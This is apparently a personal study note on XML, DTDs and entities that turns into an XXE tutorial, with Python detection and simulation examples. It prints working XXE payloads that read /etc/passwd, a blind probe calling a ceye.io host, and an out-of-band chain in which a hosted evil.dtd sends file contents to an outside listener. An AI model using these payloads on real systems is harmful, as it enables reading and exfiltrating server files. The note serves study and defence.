January 1st 2019, 12:00:00 pm
Learn: http://www.w3school.com.cn/xml/xml_intro.asp
Simple note:
XML
A simple example of XML:
<?xml version="1.0" encoding="ISO-8859-1"?>
<skate>
  <people grade="four">
    <name>azhu</name>
    <high>three board</high>
  </people>
  <people grade="one">
    <name>threezhi</name>
    <high>three board</high>
  </people>
</skate>
<!-- Avoid storing data in attributes (such as grade="four") when a child element would do; elements are easier to extend and validate. -->
In XML there are five predefined entity references, used where the literal character would be read as markup:
&lt;    <    less than
&gt;    >    greater than
&amp;   &    ampersand
&apos;  '    apostrophe
&quot;  "    quotation mark
An example of loading an XML document into an XML parser with XMLHttpRequest:

<script>
var xmlhttp, xmlDoc;
if (window.XMLHttpRequest) {
  // code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp = new XMLHttpRequest();
} else {
  // code for IE6, IE5
  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
// synchronous request (third argument false); note.xml is fetched from the same origin
xmlhttp.open("GET", "note.xml", false);
xmlhttp.send();
xmlDoc = xmlhttp.responseXML;   // the response body parsed into an XML DOM
// note.xml is expected to contain <note><to>...</to><from>...</from><body>...</body></note>.
// innerHTML renders the values as HTML; use textContent if note.xml is not fully trusted.
document.getElementById("to").innerHTML = xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue;
document.getElementById("from").innerHTML = xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue;
document.getElementById("message").innerHTML = xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue;
</script>
DTD
An example of a DTD embedded in an XML document (the internal subset); every element and attribute the document uses is declared, so a validating parser accepts it:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE skate [
  <!ELEMENT skate (people+)>
  <!ELEMENT people (name, high)>
  <!ATTLIST people grade CDATA #REQUIRED>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT high (#PCDATA)>
]>
<skate>
  <people grade="four">
    <name>azhu</name>
    <high>three board</high>
  </people>
  <people grade="one">
    <name>threezhi</name>
    <high>three board</high>
  </people>
</skate>
External DTD declaration (file_path is where the DTD lives, a file path or a URL):
<!DOCTYPE skate SYSTEM "file_path">
PCDATA means parsed character data: the parser reads the text as markup, so tags inside it are interpreted and entity references are expanded.
CDATA means character data: the parser does not interpret it as markup and does not expand entity references.
Declaring elements and attributes in a DTD:

<!ELEMENT element_name category>
<!ELEMENT element_name (content)>
<!ELEMENT element_name (element1, element2, ...)>
Empty element: <!ELEMENT element_name EMPTY>
An element that contains only text is declared with (#PCDATA): <!ELEMENT element_name (#PCDATA)>
<!ATTLIST element_name attribute_name attribute_type default_value>
<!ATTLIST payment type CDATA "check">
DTD - Entity:
Entity declarations:
Internal entity (the replacement text is given in the declaration):
DTD:
<!ENTITY name "value">
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
XML:
<author>&writer;&copyright;</author>
External entity (the replacement text is fetched from the SYSTEM identifier):
DTD:
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
XML:
<author>&writer;&copyright;</author>
Parameter entity (declared with a space after the %, referenced as %entity_name; and usable only inside the DTD, not in the document content):
<!ENTITY % entity_name "value">
<!ENTITY % entity_name SYSTEM "URL">
Try
A test of an internal entity:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE note [
  <!ELEMENT note (name)>
  <!ELEMENT name (#PCDATA)>
  <!ENTITY fuck "You">
]>
<note>
  <name>&fuck;</name>
</note>
I don't know why I can't build an XML document with an external entity successfully, so I want to put it aside for now.
DIG
When a POST body is made up of XML and we control its parameters, there may be an XXE vulnerability.
We can use a simple XML document to test for it:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
  <!ENTITY foo "Testing">
]>
<parameter>&foo;</parameter>
If the response contains "Testing", the parser expands entities declared in the DTD, and we can send other payloads to get more information.
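The probe above, worked through as an added Python example that is not from the original page: vulnerable_echo plays the endpoint that parses the body with the standard-library ElementTree and echoes the element, which is why the probe comes back as "Testing"; scan_for_xxe is the check a defender runs on the raw request text before any parser sees it, and parse_untrusted refuses any document that carries a DOCTYPE. The request bodies are constructed to mirror this page's payloads, and attacker.example is a placeholder host.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies mirroring the payloads on this page
# (attacker.example is a placeholder host, not a real listener).
PROBE = ('<?xml version="1.0" encoding="utf-8"?>'
         '<!DOCTYPE test [ <!ENTITY foo "Testing"> ]>'
         '<parameter>&foo;</parameter>')
FILE_READ = ('<?xml version="1.0"?>'
             '<!DOCTYPE a [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]>'
             '<c>&test;</c>')
BLIND = ('<?xml version="1.0"?>'
         '<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.example/x.dtd"> %remote; ]>'
         '<root/>')
CLEAN = '<?xml version="1.0"?><parameter>Testing</parameter>'

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
_EXT_DTD = re.compile(r"<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)
_ENTITY = re.compile(r"<!ENTITY\s+(%\s*)?[^\s>]+\s+(SYSTEM|PUBLIC|[\"'])", re.I)
_PE_REF = re.compile(r"%[A-Za-z_][\w.\-]*;")


def vulnerable_echo(body):
    """The endpoint as the page describes it: parse the body and echo the root
    element's text. expat expands internal entities declared in the DTD, so the
    probe comes back as "Testing"; that echo is the detection signal."""
    return ET.fromstring(body).text or ""


def scan_for_xxe(body):
    """Indicators found in the raw request text, before any parser runs."""
    findings = []
    if _DOCTYPE.search(body):
        findings.append("doctype")
    if _EXT_DTD.search(body):
        findings.append("external-dtd")
    for m in _ENTITY.finditer(body):
        parameter = "parameter-" if m.group(1) else ""
        external = m.group(2).upper() in ("SYSTEM", "PUBLIC")
        findings.append(("external-" if external else "internal-") + parameter + "entity")
    if _PE_REF.search(body):
        findings.append("parameter-entity-reference")
    return findings


def parse_untrusted(body):
    """Hardened entry point: the application never needs a DTD, so a document
    that carries one (or a stray %name; reference) is refused before expat
    sees it. Scan decoded text, not bytes, so a UTF-16 body cannot slip past."""
    if _DOCTYPE.search(body) or _PE_REF.search(body):
        raise ValueError("refused: " + ", ".join(scan_for_xxe(body)))
    return ET.fromstring(body)


def refuses(body):
    """True if parse_untrusted rejects the body."""
    try:
        parse_untrusted(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("probe echo:", vulnerable_echo(PROBE))
    for name, body in [("probe", PROBE), ("file read", FILE_READ), ("blind", BLIND), ("clean", CLEAN)]:
        print(f"{name:9} indicators={scan_for_xxe(body)} refused={refuses(body)}")
```

The standard-library ElementTree does not resolve external entities (it reports the reference as an undefined entity), so the file-read body raises a ParseError in this script rather than leaking anything; parsers that do substitute entities, such as libxml2 with LIBXML_NOENT in PHP, return the file. That is why the check rejects the declaration itself instead of trusting the parser's defaults.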
Normal XXE
<?xml version="1.0"?>
<!DOCTYPE a [
  <!ENTITY test SYSTEM "file:///etc/passwd">
]>
<c>&test;</c>
Parameter entity:

<?xml version="1.0"?>
<!DOCTYPE a [
  <!ENTITY % test SYSTEM "file:///etc/passwd">
  %test;
]>
The replacement text of %test; is inserted into the DTD itself and has to parse as markup declarations, so a file like /etc/passwd usually produces a parse error rather than an echo; this variant pays off when error messages are returned to the client, or as a blind trigger.
If the website returns nothing, there is another way to deal with this problem: host the DTD on a server we control and make the target load it. Our server's access log then shows whether the parser resolves external resources, and the declarations in the hosted DTD take effect only if it is pulled in as a parameter entity.
Use an external DTD:
XML:

<?xml version="1.0"?>
<!DOCTYPE a [
  <!ENTITY % dtd SYSTEM "http://127.0.0.1/shell.dtd">
  %dtd;
]>
<c>&foo;</c>

DTD (shell.dtd):

<!ENTITY foo SYSTEM "file:///etc/passwd">
Blind XXE with ceye.io:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
  %remote;
]>
<root/>
We can also craft a DTD that sends the result back to us out of band (an echo of the result):
XML:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
  <!ENTITY % payload SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
  %dtd;
  %send;
]>
<a/>

DTD (evil.dtd, served from *.*.*.*:8080):

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://ip.port.b182oj.ceye.io/?xml1=%payload;'>">
%all;

The % of the nested declaration is written as &#x25; because a bare % inside an entity value is read as the start of a parameter-entity reference. The nested declaration has to live in the hosted DTD rather than in the document's internal subset, where parameter-entity references inside markup declarations are not allowed. Resolving %dtd; declares all; %all; then declares send with the file contents already substituted into its URL; %send; makes the parser request that URL.
If the XXE exists, ceye.io receives a GET request with the file contents in the query string. Because the contents travel inside a URL, a file with newlines or other characters that are not valid in a URL usually breaks the request, so as written this works for short, single-line files.
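What the target's parser does with the two-stage DTD above, as an added Python example that is not from the page: a small simulator of parameter-entity processing (declarations, %name; references, character references, and the internal-subset restriction) driven over the same internal subset, with constructed stand-ins for /etc/passwd and the hosted evil.dtd, and attacker.example in place of the ceye.io listener. It returns the list of URIs the parser fetches, the last of which carries the file content, and shows the two mistakes that make the chain fail: a bare % in the nested declaration, and putting that declaration in the internal subset instead of the hosted DTD.

```python
import re

# Constructed stand-ins for everything outside the parser: what each URI returns.
# attacker.example replaces the ceye.io listener; an unlisted URI answers with an empty body.
RESOURCES = {
    "file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash",
    "http://attacker.example:8080/xml/evil.dtd":
        "<!ENTITY % all \"<!ENTITY &#x25; send SYSTEM 'http://attacker.example/?xml1=%payload;'>\">%all;",
}
# Internal subset of the document the victim parses (the page's payload, placeholder host).
INTERNAL_SUBSET = ('<!ENTITY % payload SYSTEM "file:///etc/passwd">'
                   '<!ENTITY % dtd SYSTEM "http://attacker.example:8080/xml/evil.dtd"> %dtd; %send;')
# Two constructed mistakes: a bare % in the nested declaration, and that declaration
# written in the internal subset instead of the hosted evil.dtd.
UNESCAPED = {**RESOURCES, "http://attacker.example:8080/xml/evil.dtd":
             "<!ENTITY % all \"<!ENTITY % send SYSTEM 'http://attacker.example/?xml1=%payload;'>\">%all;"}
INLINE = ('<!ENTITY % payload SYSTEM "file:///etc/passwd">'
          "<!ENTITY % all \"<!ENTITY &#x25; send SYSTEM 'http://attacker.example/?xml1=%payload;'>\"> %all; %send;")

_DECL = re.compile(r'<!ENTITY\s+%\s+(\S+)\s+(?:SYSTEM\s+(["\'])(.*?)\2|(["\'])(.*?)\4)\s*>', re.S)
_PE_REF = re.compile(r"%([A-Za-z_][\w.\-]*);")
_CHAR_REF = re.compile(r"&#(x[0-9A-Fa-f]+|[0-9]+);")


class DtdError(Exception):
    """Where a real parser stops with a well-formedness error."""


class DtdSimulator:
    def __init__(self, resources):
        self.resources = resources
        self.entities = {}  # name -> ("internal", replacement text) | ("external", uri)
        self.requests = []  # every URI the parser was made to fetch, in order

    def fetch(self, uri):
        self.requests.append(uri)
        return self.resources.get(uri, "")

    def lookup(self, name):
        if name not in self.entities:
            raise DtdError("undeclared parameter entity %" + name + ";")
        return self.entities[name]

    def expand_literal(self, literal, external_subset):
        # Replacement text of an entity value: character references are decoded (so &#x25; yields
        # a '%' that is NOT a reference) and %name; is expanded in place, which the XML spec
        # permits only inside an external DTD (WFC: PEs in Internal Subset).
        out, i = [], 0
        while i < len(literal):
            cref = _CHAR_REF.match(literal, i) if literal[i] == "&" else None
            if cref:
                ref = cref.group(1)
                out.append(chr(int(ref[1:], 16) if ref[0] == "x" else int(ref)))
                i = cref.end()
            elif literal[i] == "%":
                pe = _PE_REF.match(literal, i)
                if not pe:
                    raise DtdError("bare '%' in an entity value; write &#x25; for a literal percent")
                if not external_subset:
                    raise DtdError("parameter-entity reference inside a markup declaration in the internal subset")
                kind, value = self.lookup(pe.group(1))
                out.append(self.fetch(value) if kind == "external" else value)
                i = pe.end()
            else:
                out.append(literal[i])
                i += 1
        return "".join(out)

    def process(self, dtd_text, external_subset):
        # Walk a DTD subset made of <!ENTITY % ...> declarations and %name; references.
        pos = 0
        while pos < len(dtd_text):
            if dtd_text[pos].isspace():
                pos += 1
            elif decl := _DECL.match(dtd_text, pos):
                name, uri, literal = decl.group(1), decl.group(3), decl.group(5)
                self.entities[name] = (("external", uri) if uri is not None else
                                       ("internal", self.expand_literal(literal, external_subset)))
                pos = decl.end()
            elif ref := _PE_REF.match(dtd_text, pos):
                kind, value = self.lookup(ref.group(1))
                # External: fetch it and parse the body as DTD text. Internal: parse the stored text.
                self.process(self.fetch(value) if kind == "external" else value,
                             True if kind == "external" else external_subset)
                pos = ref.end()
            else:
                raise DtdError("unsupported markup at: " + dtd_text[pos:pos + 30])


def run_exfil_chain(internal_subset=INTERNAL_SUBSET, resources=RESOURCES):
    """URIs the parser fetched, in order; the last one is what the listener logs."""
    sim = DtdSimulator(resources)
    sim.process(internal_subset, external_subset=False)
    return sim.requests


def dtd_error(internal_subset=INTERNAL_SUBSET, resources=RESOURCES):
    """The parser's error message for this chain, or None when it completes."""
    try:
        run_exfil_chain(internal_subset, resources)
    except DtdError as err:
        return str(err)
    return None
```

Calling run_exfil_chain() returns the three fetches in order: evil.dtd, then /etc/passwd while the literal of all is being expanded, then the listener URL with the file content in the query string. dtd_error(resources=UNESCAPED) and dtd_error(INLINE) return the two errors a parser would raise instead, which is what you see when the listener stays silent after one of those mistakes.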
Of course there are many ways to obtain important and private information, but given my current ability I want to set this aside and learn more important things.
XML in PHP:
<?php
// Parses note.xml with libxml2. Do not add the LIBXML_NOENT option for untrusted input:
// it makes libxml2 substitute entities, including external ones.
$xml = simplexml_load_file("note.xml");
print_r($xml);
?>
Reference